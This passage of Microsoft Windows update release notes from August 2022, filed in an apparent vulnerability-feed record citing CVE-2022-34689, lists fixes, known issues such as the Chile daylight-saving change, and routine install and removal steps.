 * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the [Security Update Guide](<https://portal.msrc.microsoft.com/security-guidance>) and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).

### Windows 10 servicing stack update - 20348.850

This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.

## Known issues in this update

**Symptom**| **Workaround**
---|---
After installing this update, IE mode tabs in Microsoft Edge might stop responding when a site displays a modal dialog box. A modal dialog box is a form or dialog box that requires the user to respond before continuing or interacting with other portions of the webpage or app. **Developer Note** Sites affected by this issue call **window.focus**.| This issue is addressed in KB5016693.
Starting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10. Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022: time shown in Windows and apps will not be correct; apps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off; automation that uses date and time, such as Scheduled tasks, might not run at the expected time; timestamps on transactions, files, and logs will be 60 minutes off; operations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources; Windows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.| This issue is addressed in KB5017381.

## How to get this update

**Before installing this update** Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>).

**Install this update**

**Release Channel**| **Available**| **Next Step**
---|---|---
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016627>) website.
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Microsoft Server operating system-21H2; **Classification**: Security Updates

**If you want to remove the LCU** To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**. Running [Windows Update Standalone Installer](<https://support.microsoft.com/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall** switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.

**File Information** For a list of the files that are provided in this update, download the [file information for cumulative update 5016627](<https://download.microsoft.com/download/c/9/0/c903a6e1-fbe7-4978-8482-9d4c9cd3b5cc/5016627.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 20348.850](<https://download.microsoft.com/download/9/9/1/9916b98e-3f4e-42ff-8be5-1647dbbe0037/SSU_version_20348_850.csv>).

* * *

# August 9, 2022—KB5016639 (OS Build 10240.19387)

**Record:** id KB5016639 (type mskb, bulletin family microsoft); published and modified 2022-10-11; last seen 2023-03-15; CVE list: CVE-2022-34689; CVSS v3.1 base score 7.5 (HIGH), vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N, exploitability score 3.9, impact score 3.6; no CVSS v2 data; source: <https://support.microsoft.com/en-us/help/5016639>.

**NEW 8/26/22** **IMPORTANT** Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error “0x800f0922”; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\(v=ws.11\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).

**12/8/20**
For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 1507, see its update history page.

## Highlights

 * Addresses an issue that prevents certain troubleshooting tools from opening.
 * Addresses security issues for your Windows operating system.

## Improvements

This security update includes quality improvements. Key changes include:

 * Addresses an issue that prevents certain troubleshooting tools from opening.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).

## Known issues in this update

**Symptoms**| **Workaround**
---|---
Starting at 12:00 A.M. Saturday, September 10, 2022, the official time in Chile will advance 60 minutes in accordance with the August 9, 2022 official announcement by the Chilean government about a daylight saving time (DST) time zone change. This moves the DST change which was previously September 4 to September 10. Symptoms if the workaround is not used on devices between September 4, 2022 and September 11, 2022: time shown in Windows and apps will not be correct; apps and cloud services which use date and time for integral functions, such as Microsoft Teams and Microsoft Outlook, notifications and scheduling of meetings might be 60 minutes off; automation that uses date and time, such as Scheduled tasks, might not run at the expected time; timestamps on transactions, files, and logs will be 60 minutes off; operations that rely on time-dependent protocols such as Kerberos might cause authentication failures when attempting to logon or access resources; Windows devices and apps outside of Chile might also be affected if they are connecting to servers or devices in Chile or if they are scheduling or attending meetings taking place in Chile from another location or time zone. Windows devices outside of Chile should not use the workaround, as it would change their local time on the device.| To mitigate this issue, please see [Possible issues caused by new Daylight Savings Time in Chile](<https://docs.microsoft.com/windows/release-health/status-windows-10-1507#2892msgdesc>). We are working on a resolution and will provide an update in an upcoming release. **Note** We plan to release an update to support this change; however, there might be insufficient time to properly build, test, and release such an update before the change goes into effect. Please use the workaround above.

## How to get this update

**Before installing this update** Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/topic/servicing-stack-updates-ssu-frequently-asked-questions-06b62771-1cb0-368c-09cf-87c4efc4f2fe>). If you are using Windows Update, the latest SSU (KB5014024) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).

**Install this update**

**Release Channel**| **Available**| **Next Step**
---|---|---
Windows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5016639>) website.
Windows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows: **Product**: Windows 10; **Classification**: Security Updates

**File information** For a list of the files that are provided in this update, download the [file information for cumulative update 5016639](<https://download.microsoft.com/download/b/3/2/b3207cff-8f47-4014-a438-0126cd8adc99/5016639.csv>).

* * *

**NEW 8/26/22** **IMPORTANT** Microsoft released [KB5012170](<http://support.microsoft.com/help/5012170>) on August 9, 2022. It provides support for Secure Boot Forbidden Signature Database (DBX). This is a standalone, security update. Windows 8.1 and newer clients and Windows Server 2012 and newer servers must install this update regardless of whether BitLocker is enabled or supported on your device. After you install the update, you might receive error “0x800f0922”; see [Update might fail to install and you might receive a 0x800f0922 error](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#2883msgdesc>). After you install the update, your device might start up in [BitLocker recovery mode](<https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn383583\(v=ws.11\)>). See [Some devices might start up into BitLocker Recovery](<https://docs.microsoft.com/windows/release-health/status-windows-11-21h2#some-devices-might-start-up-into-bitlocker-recovery>) and [Finding your BitLocker recovery key in Windows](<https://support.microsoft.com/windows/finding-your-bitlocker-recovery-key-in-windows-6b71ad27-0b89-ea08-f143-056f5ab347d6>).

**UPDATED 8/9/22**
**IMPORTANT** Windows Server, version 20H2 is at end of service today, August 9, 2022. After August 9, 2022, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows Server. We will continue to service the following editions: Windows 10 Enterprise and Education, Windows 10 IoT Enterprise, Windows 10 Enterprise multi-session, and Windows 10 on Surface Hub.

**5/10/22**
**REMINDER** To update to one of the newer versions of Windows 10, we recommend that you use the appropriate Enablement Package KB (EKB). Using the EKB makes updating faster and easier and requires a single restart. To find the EKB for a specific OS, go to the **Improvements** section and click or tap the OS name to expand the collapsible section.

**11/17/20**
For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). For an overview of Windows 10, version 20H2, see its update history page. **Note** Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the Windows release health dashboard.

## Highlights

 * Addresses an issue that affects the printing of files you submit to a printer.
 * Addresses a known issue that might prevent the Input Indicator and Language Bar from displaying in the notification area. This issue affects devices that have more than one language installed.
 * Addresses a known issue that might cause printing operations to fail. It might also create printer duplicates on a device. The duplicate printer’s name usually has the suffix "Copy1". Applications that refer to the printer by a specific name cannot print.

## Improvements

**Note** To view the list of addressed issues, click or tap the OS name to expand the collapsible section.

### Windows 10, version 21H2

**Important:** Use EKB KB5003791 to update to Windows 10, version 21H2.

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 20H2.
 * No additional issues were documented for this release.

### Windows 10, version 21H1

**Important:** Use EKB KB5000736 to update to Windows 10, version 21H1.

This security update includes quality improvements. Key changes include:

 * This build includes all the improvements from Windows 10, version 20H2.
 * No additional issues were documented for this release.

### Windows Server, version 20H2

**Important:** Use EKB KB4562830 to update to Windows Server, version 20H2.

This security update includes improvements that were a part of update KB5015878 (released July 26, 2022) and also addresses the following issues:

 * Addresses an issue that might cause the Local Security Authority Server Service (LSASS) to leak tokens. This issue affects devices that have installed Windows updates dated June 14, 2022 or later. This issue occurs when the device performs a specific form of service for user (S4U) in a non-Trusted Computing Base (TCB) Windows service that runs as Network Service.
 * Addresses an issue that creates a duplicate print queue. This causes the original print queue to lose functionality.
 * Addresses a known issue that might prevent the Input Indicator and Language Bar from displaying in the notification area. This issue affects devices that have more than one language installed.
 * Addresses a known issue that might cause printing operations to fail. It might also create printer duplicates on a device. The duplicate printer’s name usually has the suffix "Copy1". Applications that refer to the printer by a specific name cannot print.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device. For more information about security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [August 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Aug>).

### Windows 10 servicing stack update - 19042.1852, 19043.1852, and 19044.1852

This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.

## Known issues in this update

**Symptom**| **Workaround**
---|---
Devices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later. **Note** Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps.| To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU: (1) Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab <destination path>**. (2) Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* <destination path>**. (3) You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU. If you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>).
After installing this update, IE mode tabs in Microsoft Edge might stop responding when a site displays a modal dialog box. A modal dialog box is a form or dialog box that requires the user to respond before continuing or interacting with other portions of the webpage or app. **Developer Note** Sites affected by this issue call **window.focus**.| This issue is addressed in KB5016688. If you do not want to install this release, see the instructions below. This issue is resolved using [Known Issue Rollback (KIR)](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/known-issue-rollback-helping-you-keep-windows-devices-protected/ba-p/2176831>). Please note that it might take up to 24 hours for the resolution to propagate automatically to consumer devices and non-managed business devices. Restarting your Windows device might help the resolution apply to your device faster. Enterprise-managed devices that have installed an affected update and encountered this issue can resolve it by installing and configuring the special Group Policy listed below. For information on deploying and configuring these special Group Policies, please see [How to use Group Policy to deploy a Known Issue Rollback](<https://docs.microsoft.com/troubleshoot/windows-client/group-policy/use-group-policy-to-deploy-known-issue-rollback>). Group Policy download with Group Policy name: [Download for Windows 10, version 20H2 and Windows 10, version 21H1 - ](<https://download.microsoft.com/download/8/8/0/88004bea-c83b-4d0c-9ac9-1996644578e9/Windows%2010%2020H2,%2021H1%20and%2021H2%20KB5014023%20220624_22551%20